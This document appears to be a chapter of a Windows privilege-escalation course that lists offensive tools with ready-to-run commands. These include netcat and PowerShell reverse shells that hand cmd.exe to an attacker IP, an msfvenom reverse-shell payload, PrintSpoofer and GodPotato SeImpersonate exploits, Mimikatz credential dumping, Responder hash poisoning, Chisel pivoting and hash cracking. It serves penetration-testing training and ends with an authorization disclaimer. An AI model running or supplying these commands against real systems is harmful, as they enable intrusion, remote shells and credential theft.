# 16 - Useful Tools

#### Topics

> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass

## **Why Do We Use Tools?**

In the field of cybersecurity, tools play a crucial role in automating repetitive, complex, or otherwise resource-intensive tasks. They help professionals save **time** and **effort**, which are often limited during assessments or incidents. A good tool should:

1. Clearly define its purpose and scope.
2. Be simple to use relative to its functionality.
3. Integrate seamlessly into automation workflows.
4. Provide concise and clear output.
5. Remain minimalistic, avoiding unnecessary features.
6. Be well-documented and, if possible, modifiable for specific needs.

### **Why Mindset Matters**

While tools are powerful, understanding the underlying concepts they automate remains essential. This knowledge ensures that you can:

* Customize tools to your needs.
* Develop solutions in environments where tools are unavailable.
* Mitigate tool-related detection by defenders during offensive operations.

*The best tool is always a well-trained mind.*

***

## **Useful Tools (Windows)**

### **Certutil**

Built-in Windows utility often used for certificate management. It can also download files:

```powershell
certutil -urlcache -split -f <URL> <OUTPUT-FILE>
certutil -urlcache -split -f https://example.com/file.txt file.txt
```

***

### **Invoke-WebRequest (iwr)**

PowerShell cmdlet to download files:

```powershell
iwr -uri <URL> -OutFile <OUTPUT-FILE>
iwr -uri https://example.com/file.txt -OutFile file.txt
```

***

### **Netcat (nc)**

A versatile networking tool for creating reverse shells, listening ports, and file transfers. Example for reverse shell:

```powershell
# on the target: fetch a netcat binary
iwr -uri https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe -OutFile netcat64.exe
# on the attacker: start the listener
nc -lvnp 4321
# on the target: connect back and hand over cmd.exe
.\netcat64.exe <ATTACKER-IP> 4321 -e cmd.exe
```

***

### **Invoke-PowerShellTcp**

A PowerShell reverse shell script:

```powershell
iwr -uri https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 -OutFile Invoke-PowerShellTcp.ps1
# dot-source the script so the function is loaded into the current session
. .\Invoke-PowerShellTcp.ps1
Invoke-PowerShellTcp -Reverse -IPAddress <ATTACKER-IP> -Port <PORT>
```

***

### **Msfvenom**

Tool for generating payloads. Example for a reverse shell:

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=<PORT> -f exe -o malicious.exe
```

***

### **MinGW32**

A cross-compiler for building Windows binaries from Linux. Example of building a basic program:

```c
#include <stdio.h>

int main(void) {
    printf("Hello World!\n");
    return 0;
}
```

Compile using:

```bash
x86_64-w64-mingw32-gcc -o hello.exe hello.c
```

***

### **PrintSpoofer**

Exploit for abusing the `SeImpersonatePrivilege`:

```powershell
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe
.\PrintSpoofer64.exe -c "cmd.exe"
```

***

### **GodPotato**

Similar to PrintSpoofer, used for exploiting `SeImpersonatePrivilege`:

```powershell
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe
.\GodPotato-NET2.exe -cmd "cmd.exe"
```

***

### **WinPEAS**

Windows Privilege Escalation Awesome Script:

```powershell
iwr -uri https://github.com/peass-ng/PEASS-ng/releases/download/20241205-c8c0c3e5/winPEASx64.exe -Outfile winPEASx64.exe
.\winPEASx64.exe quiet
```

***

### **PowerUp**

PowerShell script for auditing privilege escalation:

```powershell
iwr -uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 -Outfile PowerUp.ps1
Import-Module .\PowerUp.ps1
Invoke-PrivescAudit -HTMLReport
```

***

### **PrivescCheck**

Identifies misconfigurations leading to privilege escalation:

```powershell
iwr -uri "https://raw.githubusercontent.com/itm4n/PrivescCheck/master/release/PrivescCheck.ps1" -Outfile PrivescCheck.ps1
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
```

***

### **BeRoot**

Post-exploitation script for privilege escalation checks:

```powershell
iwr -uri "https://github.com/AlessandroZ/BeRoot/releases/download/1.0.1/beRoot.zip" -OutFile beRoot.zip
# the release is a zip archive: extract it before running the binary
Expand-Archive .\beRoot.zip -DestinationPath .\beRoot
# adjust the path if beRoot.exe sits in a subfolder of the extracted archive
.\beRoot\beRoot.exe
```

***

### **Mimikatz**

Advanced credential-dumping tool:

```powershell
iwr -uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip" -OutFile mimikatz_trunk.zip
# the release is a zip archive containing Win32\ and x64\ builds: extract it first
Expand-Archive .\mimikatz_trunk.zip -DestinationPath .\mimikatz_trunk
.\mimikatz_trunk\x64\mimikatz.exe
```

***

### **Impacket**

Python library for working with Windows protocols:

```bash
pip install impacket
# smbclient expects credentials in the form [domain/]user[:password]@target
impacket-smbclient <DOMAIN>/<USER>:<PASSWORD>@<TARGET-IP>
```

***

### **Responder**

Poisoning tool for capturing hashes:

```bash
git clone https://github.com/lgandx/Responder
sudo python3 Responder.py -I <INTERFACE>
```

***

### **Chisel**

TCP/UDP tunneling tool for pivoting:

```bash
chisel server -p 8080 --reverse
chisel client <SERVER-IP>:8080 R:1080:127.0.0.1:80
```

***

### **Hashcat and John the Ripper**

Tools for cracking passwords and hashes:

```bash
hashcat -m 1000 -a 0 hash.txt rockyou.txt
john --format=nt --wordlist=rockyou.txt hash.txt
```

***

### **CrackMapExec**

Network exploitation and post-exploitation framework:

```bash
crackmapexec smb <TARGET-IP>
```

{% hint style="danger" %}
**Disclaimer**

**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization! ❗**
{% endhint %}

